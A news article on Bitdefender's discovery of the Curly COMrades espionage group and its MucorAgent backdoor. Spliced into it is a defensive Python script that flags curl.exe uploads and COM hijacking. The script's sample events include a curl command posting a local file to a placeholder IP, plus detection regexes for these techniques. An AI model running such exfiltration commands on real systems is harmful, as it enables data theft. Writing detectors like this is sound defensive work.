- Bitdefender finds a new piece of malware in the wild
- It is attributed to a brand-new cyber-espionage group
- The researchers believe the group is Russian
Cybersecurity researchers at Bitdefender recently discovered a new threat actor using a never-before-seen piece of backdoor malware to target critical infrastructure organizations in Eastern Europe.
Bitdefender named the new group Curly COMrades because it relies heavily on the curl.exe tool to pull data and communicate with its C2 server, and because it hijacks Component Object Model (COM) objects during its attacks.
In its attacks, Curly COMrades deploys a backdoor named MucorAgent, a custom three-stage malware component “constructed as a .NET-based stealthy tool capable of running an AES-encrypted PowerShell script and uploading the resulting output to a particular server.”
When in doubt, blame the Russians
In other words, it is a piece of Windows malware that runs hidden commands, keeps them encrypted to avoid detection, and sends the results back to the attacker.
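The two behaviours described above, heavy use of curl.exe for C2 traffic and hijacking of COM objects, both leave traces in ordinary endpoint telemetry. The following is an added example, not code from the article or from Bitdefender, that triages a handful of constructed process-creation and registry-write events for exactly those traces: curl.exe invoked with upload options, curl.exe launched from a parent that rarely runs it, and a per-user COM class registration (HKCU\Software\Classes\CLSID\{GUID}\InprocServer32, which takes precedence over the machine-wide HKLM entry) pointing at a DLL in a user-writable directory. The log format, hostnames, GUID and file paths are all invented for the example; nothing here is a real Curly COMrades indicator.

```python
import re
from typing import Dict, List

# Constructed sample telemetry for this example (not real Curly COMrades indicators).
# One event per line, five " | "-separated fields:
#   type | user | parent process | image or registry key | command line or registry value
SAMPLE_EVENTS = [
    "process | corp\\alice | explorer.exe | C:\\Windows\\System32\\curl.exe | "
    "curl.exe -s https://updates.example.test/file.zip -o file.zip",
    "process | corp\\alice | powershell.exe | C:\\Windows\\System32\\curl.exe | "
    "curl.exe -X POST --data-binary @C:\\Users\\alice\\AppData\\Local\\Temp\\out.txt http://203.0.113.10:8080/up",
    "process | corp\\bob | winword.exe | C:\\Windows\\System32\\curl.exe | "
    "curl.exe -s http://198.51.100.7/t -o C:\\Users\\bob\\AppData\\Local\\Temp\\t.dat",
    "registry | corp\\alice | regsvr32.exe | "
    "HKCU\\Software\\Classes\\CLSID\\{11111111-2222-3333-4444-555555555555}\\InprocServer32 | "
    "C:\\Users\\alice\\AppData\\Roaming\\svc.dll",
    "registry | corp\\carol | msiexec.exe | "
    "HKLM\\Software\\Classes\\CLSID\\{22222222-3333-4444-5555-666666666666}\\InprocServer32 | "
    "C:\\Program Files\\Vendor\\vendor.dll",
    "process | corp\\dave | cmd.exe | C:\\Windows\\System32\\ping.exe | ping 10.0.0.1",
]

# curl options that send a local file or request body to a remote host (the shape of an upload).
# Case-sensitive on purpose: lowercase -f (fail silently) is not the same as -F (form upload).
CURL_UPLOAD_OPTS = re.compile(
    r"(?:^|\s)(?:-d|--data(?:-binary|-raw|-urlencode)?|-T|--upload-file|-F|--form)(?:\s|=|$)"
)

# Parent processes from which a real user rarely launches curl.exe.
UNUSUAL_PARENTS = {
    "winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
}

# Per-user COM registration: HKCU\Software\Classes is consulted before HKLM when a CLSID is
# resolved, so a write here can redirect an existing COM class to an attacker-chosen DLL.
COM_INPROC_KEY = re.compile(
    r"^(?:HKCU|HKEY_CURRENT_USER)\\Software\\Classes\\CLSID\\\{[0-9a-f-]{36}\}\\InprocServer32$",
    re.IGNORECASE,
)

# Directories an unprivileged user can write to; a COM server DLL living here is suspicious.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed log line into its five fields."""
    kind, user, parent, target, detail = [f.strip() for f in line.split(" | ", 4)]
    return {"type": kind, "user": user, "parent": parent.lower(), "target": target, "detail": detail}


def triage_events(lines) -> List[Dict[str, str]]:
    """Return one finding per event that matches a curl.exe or COM-hijack rule."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        rule = None
        if ev["type"] == "process" and ev["target"].lower().endswith("\\curl.exe"):
            if CURL_UPLOAD_OPTS.search(ev["detail"]):
                rule = "curl_upload"            # data leaving the host via curl
            elif ev["parent"] in UNUSUAL_PARENTS:
                rule = "curl_unusual_parent"    # curl spawned by an Office app or script host
        elif (ev["type"] == "registry"
              and COM_INPROC_KEY.match(ev["target"])
              and USER_WRITABLE.search(ev["detail"])):
            rule = "com_hijack"                 # per-user COM class pointed at a user-writable DLL
        if rule:
            findings.append({"rule": rule, "user": ev["user"],
                             "parent": ev["parent"], "detail": ev["detail"]})
    return findings


if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"{f['rule']:<20} {f['user']:<12} parent={f['parent']:<16} {f['detail']}")
```

Run against the constructed events, the script flags the POST with a file body, the curl.exe launched by winword.exe, and the HKCU InprocServer32 write pointing into AppData, while the plain download from explorer.exe and the HKLM entry under Program Files pass unflagged. The same three rules map directly onto Sysmon event IDs 1 (process creation) and 13 (registry value set) if you feed real telemetry instead of the sample list.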
So far, identified victims include government and justice organizations in Georgia and energy companies in Moldova.
Given the targets, the researchers believe the attackers are of Russian origin, or at least Russia-aligned.
However, they emphasized that there are no strong overlaps with known Russian APT groups, although Curly COMrades’ operations “align with the geopolitical objectives of the Russian Federation.”
Bitdefender also couldn’t determine the initial access vector, that is, how the crooks managed to infiltrate the target endpoints to deploy MucorAgent in the first place.
They did say they had seen installations of several proxy agents, including Resocks, which they suspect may have been used for that purpose.
Ever since Russia’s attention turned to Ukraine in 2014 with the annexation of Crimea, the countries on its eastern border have fallen out of the limelight. Georgia, however, is in a similar position to Ukraine, with two regions, South Ossetia and Abkhazia, having declared independence with the backing of the Russian military. It would therefore make sense for Russia’s cyber spies to keep an eye on neighboring countries and their diplomatic efforts.
Via BleepingComputer